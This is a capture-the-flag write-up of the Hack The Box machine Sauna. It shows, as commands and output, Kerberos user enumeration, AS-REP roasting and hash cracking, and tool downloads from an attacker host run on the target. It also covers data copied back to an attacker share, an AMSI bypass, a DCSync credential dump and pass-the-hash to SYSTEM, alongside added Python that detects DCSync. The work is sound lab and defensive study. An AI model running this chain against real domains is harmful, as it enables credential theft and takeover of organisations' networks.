title: Hack The Box - Sauna (DCSync abuse) author: World'sEnd layout: true categories: Internal network security tags:
• Target-practice diary
Change begins with persistence and commitment.
Hack The Box - Sauna
# Nmap 7.92 scan initiated Thu Apr 22 11:05:48 2022 as: nmap -sC -sV -T4 -Pn -p- -oA nmap.txt 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.25s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-21 21:15:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-04-21T21:16:49
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: 7h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 22 11:17:29 2022 -- 1 IP address (1 host up) scanned in 701.17 seconds
Port 53:
DNS can be used to enumerate the target's domain, but Nmap has already revealed it for me. The target also has port 80 open, and since I have no custom wordlist I personally dislike this kind of luck-based guessing. I can, however, check whether it allows a zone transfer:
$ dig axfr @10.10.10.175 sauna.htb
; <<>> DiG 9.18.0-2-Debian <<>> axfr @10.10.10.175 sauna.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
$ dig axfr @10.10.10.175 egotistical-bank.local
; <<>> DiG 9.18.0-2-Debian <<>> axfr @10.10.10.175 egotistical-bank.local
; (1 server found)
;; global options: +cmd
; Transfer failed.
As expected, neither works.
Port 80:
HTTP. By HTB convention, since this box is named Sauna, there should be a sauna.htb domain name.
It looks like a bank's public-facing site. There are many buttons that appear to send requests to the server, but they are all fake: they only jump between static HTML pages. I could intercept the requests and try changing the requested file, but directory brute-forcing seems more direct.
It does have a few input forms; I can even see their request method and capture the requests.
But whatever I submit, the server returns an error. I did find their team information, though:
I will keep this in mind: if I need to enumerate or brute-force later, it may give me some reference material. So now I need to brute-force directories.
[11:43:44] 403 - 312B - /%2e%2e//google.com
[11:44:53] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[11:44:59] 200 - 30KB - /about.html
[11:45:57] 200 - 15KB - /contact.html
[11:45:59] 301 - 144B - /css -> http://sauna.htb/css/
[11:46:19] 301 - 146B - /fonts -> http://sauna.htb/fonts/
[11:46:28] 403 - 1KB - /images/
[11:46:28] 301 - 147B - /images -> http://sauna.htb/images/
[11:46:30] 200 - 32KB - /index.html
Nothing there. Perhaps I could try brute-forcing by IP, in case some internal assets are exposed to the outside, but likewise nothing turned up.
RPC:
Port 88 is Kerberos. Since at the moment I have nothing but those few names, I will set it aside for now; perhaps I can collect more user information elsewhere. I can try RPC:
rpcclient -U "" 10.10.10.175 -N
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
RPC rejected me.
LDAP:
Awkward: I don't know how to use ldapsearch. Following the tutorials I found, it keeps telling me the usage is wrong, so I am setting this aside for now.
$ ldapsearch -x -h 10.10.10.175 -s base namingcontexts
ldapsearch: unrecognized option -
usage: ldapsearch [options] [filter [attributes...]]
where:
filter RFC 4515 compliant LDAP search filter
attributes whitespace-separated list of attribute descriptions
which may include:
1.1 no attributes
* all user attributes
+ all operational attributes
Search options:
-a deref one of never (default), always, search, or find
SMB:
SMB allows anonymous access, but there is nothing there:
$ smbclient -N -L //10.10.10.175
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Kerberos:
Well, the HTTP services on the other open ports cannot be accessed normally either. I still can't use LDAP; the tutorials I found are somewhat outdated and do not apply to my situation. I have to turn my attention back to Kerberos. The only information I have that seems usable is the team member names from port 80, so I can try to build a wordlist.
When building a wordlist, consider the target's environment and conventions. Western names are generally written with capitalized first and last names, but system login names are usually all lowercase or abbreviated, and that has to be taken into account. Intelligence about the target's naming convention would make enumeration easier, but I have none. It also helps to add a few common usernames. My wordlist looks like this:
administrator
Administrator
Fergus Smith
fergus smith
FergusSmith
fergussmith
shaun coins
shauncoins
Shaun Coins
ShaunCoins
Hugo Bear
HugoBear
hugo bear
hugobear
Bowie Taylor
BowieTaylor
bowie taylor
bowietaylor
Sophie Driver
SophieDriver
sophie driver
sophiedriver
Steven Kerb
StevenKerb
steven kerb
stevenkerb
admin
Admin
Of course this is not enough. On GitHub there are simple Python scripts that generate more possible usernames by combining the name parts:
https://github.com/krlsio/python/blob/main/namemash.py
That gives me a new wordlist containing more candidate usernames:
$ sudo python3 namemash.py user.txt
Then I can enumerate the target's accounts with Kerbrute:
$ sudo ./kerbrute userenum -d EGOTISTICAL-BANK.LOCAL ./user.txt --dc 10.10.10.175
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/22/22 - Ronnie Flathers @ropnop
2022/04/22 12:57:37 > Using KDC(s):
2022/04/22 12:57:37 > 10.10.10.175:88
2022/04/22 12:57:37 > [+] VALID USERNAME: administrator@EGOTISTICAL-BANK.LOCAL
2022/04/22 12:57:37 > [+] VALID USERNAME: administrator@EGOTISTICAL-BANK.LOCAL
2022/04/22 12:57:38 > [+] VALID USERNAME: administrator@EGOTISTICAL-BANK.LOCAL
2022/04/22 12:57:38 > [+] VALID USERNAME: administrator@EGOTISTICAL-BANK.LOCAL
2022/04/22 12:57:38 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2022/04/22 12:57:38 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2022/04/22 12:57:46 > Done! Tested 309 usernames (6 valid) in 9.346 seconds
I enumerated the fsmith account:
Perhaps I have guessed their account naming convention, so I can enumerate once more:
scois
hbear
btaylor
sdriver
skerb
Well, the target is only willing to tell me about fsmith:
$ sudo ./kerbrute userenum -d EGOTISTICAL-BANK.LOCAL ./user.txt --dc 10.10.10.175
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/22/22 - Ronnie Flathers @ropnop
2022/04/22 13:02:40 > Using KDC(s):
2022/04/22 13:02:40 > 10.10.10.175:88
2022/04/22 13:02:41 > Done! Tested 5 usernames (0 valid) in 0.340 seconds
So I can narrow the list down further:
administrator
fsmith
Then I use impacket-0.9.24/examples/GetNPUsers.py to try to obtain hashes for these users:
$ ./posttool/impacket-0.9.24/examples/GetNPUsers.py 'EGOTISTICAL-BANK.LOCAL/' -usersfile ./user.txt -format hashcat -outputfile hashes.txt -dc-ip 10.10.10.175
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
$ cat hashes.txt
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:52460b6eb0d8bb3dfa86e34923b80370$...
I can use hashcat to brute-force it:
$ hashcat -m 18200 ./hashes.aspreroast /usr/share/wordlists/rockyou.txt --force
......
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:52460b6eb0d8bb3dfa86e34923b80370$...:Thestrokes23
.....
Candidates.#1....: Throy1 -> Thelittlemermaid
Hardware.Mon.#1..: Util: 60%
Started: Fri Apr 22 13:10:32 2022
Stopped: Fri Apr 22 13:11:28 2022
Getting a shell as fsmith and obtaining user.txt:
I have fsmith's password, so I can try logging in to the target:
$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents>
I'm in, and I found user.txt on the desktop:
*Evil-WinRM* PS C:\Users\FSmith> cd desktop
*Evil-WinRM* PS C:\Users\FSmith\desktop> ls
Directory: C:\Users\FSmith\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/22/2022 4:28 AM 34 user.txt
*Evil-WinRM* PS C:\Users\FSmith\desktop> type user.txt
I can take a look at the current user's privileges:
*Evil-WinRM* PS C:\Users\FSmith\desktop> whoami /all
USER INFORMATION
----------------
User Name SID
====================== ==============================================
egotisticalbank\fsmith S-1-5-21-2966785786-3096785034-1186376766-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
fsmith's three privileges are of no use to me.
Perhaps I can try enumerating system vulnerabilities: if I can get SYSTEM on the target, the domain no longer matters. I can transfer WinPEAS.exe over and let it enumerate privilege-escalation information for me.
*Evil-WinRM* PS C:\Users\FSmith\desktop> wget http://10.10.16.7/WinPEASx86.exe -O WinPEAS.exe -UseBasicParsing
*Evil-WinRM* PS C:\Users\FSmith\desktop> ./WinPEAS.exe cmd fast > sauna_winpeas_fast
There is this entry in the target's registry:
[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
It looks like I have obtained another account. Although WinPEAS enumerated it, I can also check it manually:
*Evil-WinRM* PS C:\Users\FSmith\desktop> reg.exe query "HKLM\software\microsoft\windows nt\currentversion\winlogon"
HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ EGOTISTICALBANK
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x156458a35
ShutdownFlags REG_DWORD 0x13
DisableLockWorkstation REG_DWORD 0x0
DefaultPassword REG_SZ Moneymakestheworldgoround!
I can try to log in as that user:
$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
But the login failed. Looking more closely:
*Evil-WinRM* PS C:\Users\FSmith\desktop> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
The command completed with one or more errors.
There is no svc_loanmanager user at all, but there is one with a very similar name, so I can try that:
$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>
Getting a shell as svc_loanmgr:
But this account has no more privileges either; it is the same as fsmith:
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
=========================== ==============================================
egotisticalbank\svc_loanmgr S-1-5-21-2966785786-3096785034-1186376766-1108
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
I tried running WinPEAS again as svc_loanmgr to enumerate escalation information, but nothing new turned up. I will use SharpHound to collect data:
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> wget http://10.10.16.7/SharpHound.exe -O SharpHound.exe -UseBasicParsing
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> ls
Directory: C:\Users\svc_loanmgr\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/22/2022 6:38 AM 906752 SharpHound.exe
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> ./SharpHound.exe
I start an SMB share to transfer bloodhound.zip back to my machine:
$ ./smbserver.py share . -smb2support -username whoami -password whoami
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> cp 20220422063933_BloodHound.zip \\10.10.16.7\share
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>
But BloodHound seems to have a problem, or the target environment does: the user file SharpHound returned was empty, whether collected as svc_loanmgr or as fsmith, so the node graph I see in BloodHound may be wrong.
No matter, I can still use PowerView. PowerView is sometimes flagged by AMSI as a malicious script, and Evil-WinRM provides a module to disable it (no wonder the tool is so pushy; "Evil" lives up to its name). It does more than disable AMSI; it has other features too:
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> menu
,. ( . ) " ,. ( . ) .
(" ( ) )' ,' ( ' (" ) )' ,' . ,)
.; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )((
_".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _')
\_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \
| __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \
| \\ /| | |__ /_____/ \ /| | | \ | \/ Y \
/_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ /
\/ \/ \/ \/ \/
By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Bypass-4MSI
[+] Success!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> wget http://10.10.16.7/PowerView.ps1 -O PowerView.ps1 -UseBasicParsing
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> . .\PowerView.ps1
After loading PowerView, I can use Invoke-ACLScanner to check for interesting permissions on objects in the domain. There are many; I list only the key one:
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> invoke-aclscanner
ObjectDN : DC=EGOTISTICAL-BANK,DC=LOCAL
AceQualifier : AccessAllowed
ActiveDirectoryRights : ExtendedRight
ObjectAceType : 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
AceFlags : None
AceType : AccessAllowedObject
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-2966785786-3096785034-1186376766-1108
IdentityReferenceName : svc_loanmgr
IdentityReferenceDomain : EGOTISTICAL-BANK.LOCAL
IdentityReferenceDN : CN=L Manager,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
IdentityReferenceClass : user
The main points are these three lines:
ObjectDN : DC=EGOTISTICAL-BANK,DC=LOCAL // the target domain
ActiveDirectoryRights : ExtendedRight // an Active Directory extended right
IdentityReferenceName : svc_loanmgr // exactly my current user
My current user holds an extended right on the target domain. This permission attribute is quite important: it allows me to launch a DCSync attack against the target and obtain the hashes of the domain accounts it stores. I can use secretsdump.py from the impacket/examples directory to launch the DCSync attack.
There are many hashes to be had, so I list only the key part, such as the administrator account's:
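As an added defender-side example (not code from the writeup, PowerView or Impacket), the following Python audits Invoke-ACLScanner style output for exactly this condition: an allow ACE on the domain object that grants a replication extended right (the ObjectAceType GUID above is DS-Replication-Get-Changes) or GenericAll to a principal outside the set that legitimately replicates. The sample records and the EXPECTED_HOLDERS baseline are constructed assumptions.

```python
"""Audit ACEs on the domain naming context for DCSync-capable principals."""
import re

# Rights GUIDs of the three replication extended rights. Get-Changes plus
# Get-Changes-All on the domain object is what a DRSUAPI (DCSync) pull needs.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumed baseline of principals that legitimately hold these rights.
EXPECTED_HOLDERS = {
    "Domain Controllers", "Enterprise Domain Controllers", "Enterprise Read-only Domain Controllers",
    "Administrators", "Domain Admins", "Enterprise Admins",
}

# Constructed sample in Invoke-ACLScanner's 'Key : Value' layout; record 1 mirrors the writeup.
SAMPLE_ACL = """\
ObjectDN              : DC=EGOTISTICAL-BANK,DC=LOCAL
AceQualifier          : AccessAllowed
ActiveDirectoryRights : ExtendedRight
ObjectAceType         : 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
IdentityReferenceName : svc_loanmgr

ObjectDN              : DC=EGOTISTICAL-BANK,DC=LOCAL
AceQualifier          : AccessAllowed
ActiveDirectoryRights : ExtendedRight
ObjectAceType         : 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
IdentityReferenceName : Domain Controllers

ObjectDN              : DC=EGOTISTICAL-BANK,DC=LOCAL
AceQualifier          : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType         : 00000000-0000-0000-0000-000000000000
IdentityReferenceName : helpdesk
"""


def parse_records(text):
    """Split blank-line separated blocks into one dict per ACE."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            key, sep, value = line.partition(":")
            if sep:
                rec[key.strip()] = value.strip()
        if rec:
            records.append(rec)
    return records


def find_dcsync_grants(text):
    """Return (principal, right) for each allow ACE on the domain object that hands
    a replication right, or GenericAll (which implies it), to an unexpected principal."""
    findings = []
    for rec in parse_records(text):
        if rec.get("AceQualifier") != "AccessAllowed":
            continue  # deny ACEs grant nothing
        if not rec.get("ObjectDN", "").upper().startswith("DC="):
            continue  # replication rights only matter on the naming context head
        right = REPLICATION_RIGHTS.get(rec.get("ObjectAceType", "").lower())
        if "GenericAll" in rec.get("ActiveDirectoryRights", ""):
            right = "GenericAll (implies all replication rights)"
        if right is None:
            continue
        who = rec.get("IdentityReferenceName", "?")
        if who not in EXPECTED_HOLDERS:
            findings.append((who, right))
    return findings
```

Running find_dcsync_grants(SAMPLE_ACL) reports svc_loanmgr and helpdesk and stays silent on Domain Controllers; remediation is removing the ACE rather than the account.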
$ ./secretsdump.py svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
......
[*] Cleaning up...
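On the defensive side, a DCSync pull like the one above is recorded on the DC as Security Event 4662 with Access Mask 0x100 (control access) and the replication right GUIDs in the Properties field; domain controllers do this with their computer accounts, so a user principal in that position is the signal. The following Python, an added example that is not part of the writeup, runs that check over constructed log records; the flattened key=value layout and the DC02$ host name are assumptions.

```python
"""Flag DCSync-style replication requests in Security log records."""
import re

# Replication control access rights; any of them in a 4662 Properties field
# means the subject exercised a replication right against the directory.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}")
CONTROL_ACCESS = 0x100  # Access Mask bit for an extended (control access) right

# Constructed records in a flattened key=value form. Real 4662 events carry the
# same field names; only the layout is simplified. Record 2 is the shape a
# secretsdump DCSync run as svc_loanmgr leaves on the DC.
SAMPLE_EVENTS = [
    "EventID=4662 SubjectUserName=DC02$ SubjectDomainName=EGOTISTICALBANK "
    "AccessMask=0x100 Properties=%{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=svc_loanmgr SubjectDomainName=EGOTISTICALBANK "
    "AccessMask=0x100 Properties=%{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=fsmith SubjectDomainName=EGOTISTICALBANK "
    "AccessMask=0x10 Properties=%{bf967aba-0de6-11d0-a285-00aa003049e2}",
    "EventID=4624 SubjectUserName=svc_loanmgr SubjectDomainName=EGOTISTICALBANK LogonType=3",
]


def parse_event(line):
    """Turn 'key=value key=value' into a dict (values contain no spaces here)."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def is_dcsync(event):
    """True when a non-machine account exercised a replication right."""
    if event.get("EventID") != "4662":
        return False
    if int(event.get("AccessMask", "0"), 16) & CONTROL_ACCESS == 0:
        return False
    guids = set(GUID_RE.findall(event.get("Properties", "").lower()))
    if not guids & REPLICATION_GUIDS:
        return False
    # DCs replicate with their computer accounts; a user principal here is the
    # signature of DCSync (or of a mis-delegated service account, as on Sauna).
    return not event.get("SubjectUserName", "").endswith("$")


def detect(lines):
    """Return (domain\\user, sorted replication GUIDs) for every record worth alerting on."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_dcsync(ev):
            rights = sorted(set(GUID_RE.findall(ev["Properties"].lower())) & REPLICATION_GUIDS)
            hits.append((f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}", rights))
    return hits
```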
Shell as Administrator:
Now I can pass the hash to move onto the target machine:
$ ./psexec.py administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file xamIegER.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service UzYN on 10.10.10.175.....
[*] Starting service UzYN.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
I can read root.txt:
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC
Directory of C:\Users\Administrator\Desktop
07/14/2021 03:35 PM .
07/14/2021 03:35 PM ..
04/22/2022 04:28 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 7,829,065,728 bytes free
C:\Users\Administrator\Desktop> type root.txt
It seems that if you can't recognize the various users, groups and permissions in Active Directory well enough to translate them fluently, they become a major stumbling block on the road to learning Active Directory.